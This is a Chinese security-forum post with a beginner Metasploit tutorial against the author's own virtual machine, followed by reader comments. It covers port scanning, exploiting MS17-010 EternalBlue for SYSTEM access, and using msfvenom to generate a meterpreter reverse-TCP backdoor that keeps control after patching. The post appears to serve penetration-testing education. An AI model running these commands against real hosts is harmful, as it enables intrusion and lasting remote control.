用户
搜索
  • TA的每日心情
    慵懒
    2020-6-15 20:25
  • 签到天数: 16 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋-脚本小子

    Rank: 2

    4

    主题

    12

    帖子

    326

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2017-11-20
    发表于 2020-7-28 17:18:07 61058
    本帖最后由 i2stay 于 2020-7-28 18:49 编辑

    本文原创作者i2stay,本文属i春秋原创奖励计划,未经许可禁止转载!
    一、介绍
    MetaSploit是一个开源的渗透测试框架,具有很好的扩展性,内含上千个已知的漏洞, 还有第三方程序的接口,如Sqlmap、nmap等。
    kali中预装了MetaSploit,在终端中输入 service postgresql start 开启数据库,然后输入msfconsole。

    msf由多个模块组成,各个模块的功能如下1.Auxiliaries(辅助模块)
    用于验证漏洞是否存在,可以利用。
    2.Exploit(漏洞利用模块)
    P包含漏洞的POC验证程序
    3.Payload(攻击载荷模块)
    实际攻击的代码
    4.Post(后期渗透模块)
    后渗透攻击时会用的,如探测敏感信息,实施跳板。
    5.(编码工具模块)
    过免杀
    二、端口扫描
    1.使用 search命令查找模块
    msf5 > search portscan


    Matching Modules
    ================


       Name                                              Disclosure Date  Rank    Check  Description
       ----                                              ---------------  ----    -----  -----------
       auxiliary/scanner/http/wordpress_pingback_access                   normal  Yes    Wordpress Pingback Locator
       auxiliary/scanner/natpmp/natpmp_portscan                           normal  Yes    NAT-PMP External Port Scanner
       auxiliary/scanner/portscan/ack                                     normal  Yes    TCP ACK Firewall Scanner
       auxiliary/scanner/portscan/ftpbounce                               normal  Yes    FTP Bounce Port Scanner
       auxiliary/scanner/portscan/syn                                     normal  Yes    TCP SYN Port Scanner
       auxiliary/scanner/portscan/tcp                                     normal  Yes    TCP Port Scanner
       auxiliary/scanner/portscan/xmas                                    normal  Yes    TCP "XMas" Port Scanner
       auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
    选择辅助模块    auxiliary/scanner/portscan/tcp      
    利用此模块  use auxiliary/scanner/portscan/tcp  show options可以查看需要的参数
    msf5 > use auxiliary/scanner/portscan/tcp
    msf5 auxiliary(scanner/portscan/tcp) > show options

    Module options (auxiliary/scanner/portscan/tcp):

       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       CONCURRENCY  10               yes       The number of concurrent ports to check per host
       DELAY        0                yes       The delay between connections, per thread, in milliseconds
       JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
       PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
       RHOSTS                        yes       The target address range or CIDR identifier
       THREADS      1                yes       The number of concurrent threads
       TIMEOUT      1000             yes       The socket connect timeout in milliseconds
    这里主要设置 rhosts为要扫描的主机ip,ports为要扫描的端口可用指定,threads为线程
    rhosts用我本机的一台虚拟机  使用set命令来进行设置 unset可撤销
    msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.132.129
    rhosts => 192.168.132.129
    msf5 auxiliary(scanner/portscan/tcp) > set ports 21,22,23,139,143,145,3389,445
    ports => 21,22,23,139,143,145,3389,445
    msf5 auxiliary(scanner/portscan/tcp) > set threads 20
    threads => 20

    然后运行一下,run
    msf5 auxiliary(scanner/portscan/tcp) > run

    [+] 192.168.132.129:      - 192.168.132.129:139 - TCP OPEN
    [+] 192.168.132.129:      - 192.168.132.129:3389 - TCP OPEN
    [+] 192.168.132.129:      - 192.168.132.129:445 - TCP OPEN
    192.168.132.129:      - Scanned 1 of 1 hosts (100% complete)
    Auxiliary module execution completed
    发现目标开放 139,3389,445端口。
    也可以使用nmap进行扫描 输入back返回到最初 只能输入nmap指令就可以
    msf5 auxiliary(scanner/portscan/tcp) > back
    msf5 > nmap -sV 192.168.132.129 -Pn
    exec: nmap -sV 192.168.132.129 -Pn

    Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-28 04:20 EDT
    Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
    Service scan Timing: About 30.00% done; ETC: 04:23 (0:02:06 remaining)
    Nmap scan report for 192.168.132.129
    Host is up (0.00056s latency).
    Not shown: 990 closed ports
    PORT      STATE SERVICE        VERSION
    135/tcp   open  msrpc          Microsoft Windows RPC
    139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds   Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
    3389/tcp  open  ms-wbt-server?
    49152/tcp open  msrpc          Microsoft Windows RPC
    49153/tcp open  msrpc          Microsoft Windows RPC
    49154/tcp open  msrpc          Microsoft Windows RPC
    49155/tcp open  msrpc          Microsoft Windows RPC
    49156/tcp open  msrpc          Microsoft Windows RPC
    49157/tcp open  msrpc          Microsoft Windows RPC
    MAC Address: 00:0C:29:68:3E:84 (VMware)
    Service Info: Host: WIN-52A12ULIOUA; OS: Windows; CPE: cpe:/o:microsoft:windows

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 87.53 seconds


    MSF也还可以对主机上运行的服务进行破解,如FTP SSH TElENT MYSQL 等 需要自己配置字典
    三、对ms17_010进行实战


    因为我们通过扫描端口发现对方主机开放445端口
    msf5 > search ms17

    Matching Modules
    ================

       Name                                                   Disclosure Date  Rank     Check  Description
       ----                                                   ---------------  ----     -----  -----------
       auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
       auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
       auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
       auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
       auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
       auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       auxiliary/scanner/smb/smb_ms17_010                                      normal   Yes    MS17-010 SMB RCE Detection
       exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
       exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       exploit/windows/smb/ms17_010_p**ec                    2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


    我们发现存在一个验证有一个利用模块 2 (1).png
    这里提示存在漏洞 然后进行攻击
    QQ截图20200728164259 (1).png
    QQ截图20200728164446 (1).png
    我们已经拿到了sytem权限 可以进行后渗透攻击
    四、植入后门
    后门是我们为了维持目标主机的权限控制,即使漏洞被修复,我们还可以通过后门继续控制目标系统
    利用msfcenom生成后门 Lhost为我们的攻击机ip lport为监听的端口
    root@kali:~# msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.132.130 LPORT=54321 -f exe > shell.exe
    [-] No platform was selected, choosing Msf::Module:latform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 341 bytes
    Final size of exe file: 73802 bytes
    QQ截图20200728165650.png
    我们看到已经生成了shell。exe的后门 我们把他放到靶机上
    打开msf中的后门模块  use exploit/multi/handler 设置lhost,lport 然后run一下 靶机上运行一下后门
    下载.png
    输入shell  我们就同样拿到目标机的权限
    下载 (1).png









    发表于 2020-7-29 10:59:26
    大佬,很强
    使用道具 举报 回复
    表哥带带我
    使用道具 举报 回复
    发表于 2020-7-29 11:45:43
    本帖最后由 夜尽 于 2020-7-29 11:46 编辑

    这个有点太入门了,另类姿势结合使用比较有看点
    使用道具 举报 回复
    发表于 2020-7-29 11:46:50
    哈哈哈,有点入门,适合小白~
    使用道具 举报 回复
    发表于 2020-7-29 20:09:16
    夜尽 发表于 2020-7-29 11:45
    这个有点太入门了,另类姿势结合使用比较有看点

    写这个的初衷是因为的同事说光知道msf很牛逼但不知道怎么用,所以就写了 确实是比较入门的,可能有些人只知道粘贴复制来玩msf 希望看了这篇文章后自己就可以动手去操作
    使用道具 举报 回复
    发表于 2020-7-30 20:20:36
    虽然是入门的,希望能一直更新下去,还有很多小白不是很明白呢
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册